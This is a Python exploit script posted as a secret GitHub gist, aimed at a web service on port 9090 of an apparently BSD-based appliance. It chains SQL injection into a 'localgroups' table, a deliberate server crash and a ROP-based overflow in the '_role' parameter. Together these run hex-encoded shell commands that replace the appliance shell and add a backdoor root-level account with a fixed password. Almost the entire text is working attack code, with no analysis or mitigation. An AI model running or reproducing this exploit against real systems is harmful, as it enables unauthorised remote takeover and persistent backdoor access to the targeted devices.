Skip to content

Instantly share code, notes, and snippets.

@rrrrrrri

rrrrrrri/dd.py Secret

Created July 31, 2024 00:34
Show Gist options
  • Save rrrrrrri/b94552a353f81f57ac6e6cc66062fedd to your computer and use it in GitHub Desktop.
Save rrrrrrri/b94552a353f81f57ac6e6cc66062fedd to your computer and use it in GitHub Desktop.
from pwn import *
import requests
import argparse
from requests.packages import urllib3
urllib3.disable_warnings()
parser = argparse.ArgumentParser()
parser.add_argument('-ip', help='target url')
args = parser.parse_args()
class POC:
def __init__(self, ip):
self.ip = ip
def generate_groupnames(self):
_groupnames = []
basic_chs = "abcdefghijklmnopqrstuvwxyz0123456789"
_tmp = 0
for x in basic_chs:
for y in basic_chs:
if _tmp >= 1034:
return _groupnames
_tmp_str = x + y
_groupnames.append(_tmp_str)
_tmp += 1
def _add_sql(self, payload):
URL = "http://" + self.ip + ":9090/query/clientverification2?_uname=array'));" + payload + ";/**/--"
HEADERS = {"Connection": "close"}
res = requests.get(URL, headers=HEADERS, verify=False, timeout=5)
if "<Rules>" not in res.text:
print(payload)
exit(0)
def _crash_server(self):
try:
URL = "http://" + self.ip + ":9090/query/hosts"
HEADERS = {"Content-Type": "application/xml"}
DATA = "<xml>\r\n <GroupNotification Op=\"0\" MasterID=\"1\" PeerID=\"2\" GID=\"3\">\r\n </GroupNotification>\r\n</xml>"
requests.post(URL, headers=HEADERS, data=DATA, verify=False, timeout=5)
except:
pass
def _rock(self):
group_names = self.generate_groupnames()
sql_payloads = []
_id = 1
for gpname in group_names:
_tmp_id = _id
if _tmp_id == 0x403:
_tmp_id = 24095752
elif _tmp_id == 0x404:
_tmp_id = 8
elif _tmp_id == 0x408:
_tmp_id = 1031
elif _tmp_id == 0x407:
_tmp_id = 123457
elif _tmp_id == 8:
_tmp_id = 123456
_payload = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (str(_tmp_id), gpname)
sql_payloads.append(_payload)
_id += 1
delete_payload = "delete/**/from/**/localgroups"
URL = "http://" + self.ip + ":9090/query/clientverification2?_uname=array'));" + delete_payload + ";/**/--"
HEADERS = {"Connection": "close"}
res = requests.get(URL, headers=HEADERS, verify=False, timeout=5)
if "<Rules>" not in res.text:
exit(0)
for p in sql_payloads:
self._add_sql(p)
pop_rdi_ret = 0x0044f6ce
system_address = 0x0044D21C
command_address1 = 0xffffe6e0
command_address2 = 0x00007fff
command_p27 = 0x3b3020
command_p26 = 0x682d2074
command_p25 = 0x6f6f7220
command_p24 = 0x646f6d72
command_p23 = 0x65737520
command_p22 = 0x7770207c
command_p21 = 0x20333231
command_p20 = 0x656d6b63
command_p19 = 0x3066206f
command_p18 = 0x6863653b
command_p17 = 0x6c6c6568
command_p16 = 0x735f6163
command_p15 = 0x2f6e6962
command_p14 = 0x2f61632f
command_p13 = 0x2068732f
command_p12 = 0x6e69622f
command_p11 = 0x2070633b
command_p10 = 0x6b61622e
command_p9 = 0x6c6c6568
command_p8 = 0x735f6163
command_p7 = 0x2f6e6962
command_p6 = 0x2f61632f
command_p5 = 0x206c6c65
command_p4 = 0x68735f61
command_p3 = 0x632f6e69
command_p2 = 0x622f6163
command_p1 = 0x2f207063
command_part2_5 = 0x3b6c6c65
command_part2_4 = 0x68735f61
command_part2_3 = 0x632f6e69
command_part2_2 = 0x622f6163
command_part2_1 = 0x2f206d72
command_part3_8 = 0x3b6c2d20
command_part3_7 = 0x736c3b6c
command_part3_6 = 0x65656877
command_part3_5 = 0x20472d20
command_part3_4 = 0x79617272
command_part3_3 = 0x6120646f
command_part3_2 = 0x6d726573
command_part3_1 = 0x75207770
gadget_sql_payload = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (pop_rdi_ret, "gad")
system_sql_payload2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (system_address, "sys")
command_addr_sql_payload1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_address1, "ca1")
command_addr_sql_payload2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_address2, "ca2")
zero_sql_payload = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % ("0", "zer")
command_sql_payload1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p1, "cm1")
command_sql_payload2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p2, "cm2")
command_sql_payload3 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p3, "cm3")
command_sql_payload4 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p4, "cm4")
command_sql_payload5 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p5, "cm5")
command_sql_payload6 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p6, "cm6")
command_sql_payload7 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p7, "cm7")
command_sql_payload8 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p8, "cm8")
command_sql_payload9 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p9, "cm9")
command_sql_payload10 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p10, "cm10")
command_sql_payload11 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p11, "cm11")
command_sql_payload12 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p12, "cm12")
command_sql_payload13 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p13, "cm13")
command_sql_payload18 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p18, "cm18")
command_sql_payload19 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p19, "cm19")
command_sql_payload20 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p20, "cm20")
command_sql_payload21 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p21, "cm21")
command_sql_payload22 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p22, "cm22")
command_sql_payload23 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p23, "cm23")
command_sql_payload24 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p24, "cm24")
command_sql_payload25 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p25, "cm25")
command_sql_payload26 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p26, "cm26")
command_sql_payload27 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_p27, "cm27")
command_sql_payload_part2_1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part2_1, "cmp21")
command_sql_payload_part2_5 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part2_5, "cmp25")
command_sql_payload_part3_1 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_1, "cmp31")
command_sql_payload_part3_2 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_2, "cmp32")
command_sql_payload_part3_3 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_3, "cmp33")
command_sql_payload_part3_4 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_4, "cmp34")
command_sql_payload_part3_5 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_5, "cmp35")
command_sql_payload_part3_6 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_6, "cmp36")
command_sql_payload_part3_7 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_7, "cmp37")
command_sql_payload_part3_8 = "insert/**/into/**/localgroups/**/(group_id,inst_id,groupname,params)/**/values/**/(%s,1,\"%s\",\"p\")" % (command_part3_8, "cmp38")
self._add_sql(gadget_sql_payload)
self._add_sql(system_sql_payload2)
self._add_sql(command_addr_sql_payload1)
self._add_sql(command_addr_sql_payload2)
self._add_sql(zero_sql_payload)
self._add_sql(command_sql_payload1)
self._add_sql(command_sql_payload2)
self._add_sql(command_sql_payload3)
self._add_sql(command_sql_payload4)
self._add_sql(command_sql_payload5)
self._add_sql(command_sql_payload6)
self._add_sql(command_sql_payload7)
self._add_sql(command_sql_payload8)
self._add_sql(command_sql_payload9)
self._add_sql(command_sql_payload10)
self._add_sql(command_sql_payload11)
self._add_sql(command_sql_payload12)
self._add_sql(command_sql_payload13)
self._add_sql(command_sql_payload18)
self._add_sql(command_sql_payload19)
self._add_sql(command_sql_payload20)
self._add_sql(command_sql_payload21)
self._add_sql(command_sql_payload22)
self._add_sql(command_sql_payload23)
self._add_sql(command_sql_payload24)
self._add_sql(command_sql_payload25)
self._add_sql(command_sql_payload26)
self._add_sql(command_sql_payload27)
self._add_sql(command_sql_payload_part2_1)
self._add_sql(command_sql_payload_part2_5)
self._add_sql(command_sql_payload_part3_1)
self._add_sql(command_sql_payload_part3_2)
self._add_sql(command_sql_payload_part3_3)
self._add_sql(command_sql_payload_part3_4)
self._add_sql(command_sql_payload_part3_5)
self._add_sql(command_sql_payload_part3_6)
self._add_sql(command_sql_payload_part3_7)
self._add_sql(command_sql_payload_part3_8)
self._crash_server()
sleep(5)
try:
_role = ""
for _gp in group_names:
_role += _gp
_role += ":"
_role += "gad:zer:ca1:ca2:sys:zer:cmp31:cmp32:cmp33:cmp34:cmp35:cmp36:cmp37:cmp38:cmp21:cm2:cm3:cm4:cmp25:cm1:cm2:cm3:cm4:cm5:cm6:cm7:cm8:cm9:cm10:cm11:cm12:cm13:cm6:cm7:cm8:cm9:cm18:cm19:cm20:cm21:cm22:cm23:cm24:cm25:cm26:cm27"
t_payload = "GET /query/hosts?_uname=array&_pid=admin&_role=" + _role + " HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"
p = remote(self.ip, 9090)
p.send(t_payload)
print(p.recv())
p.close()
except:
pass
def start(self):
self._rock()
if __name__ == "__main__":
if args.ip:
try:
poc = POC(args.ip)
poc.start()
except Exception as e:
print(e)
else:
pass
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment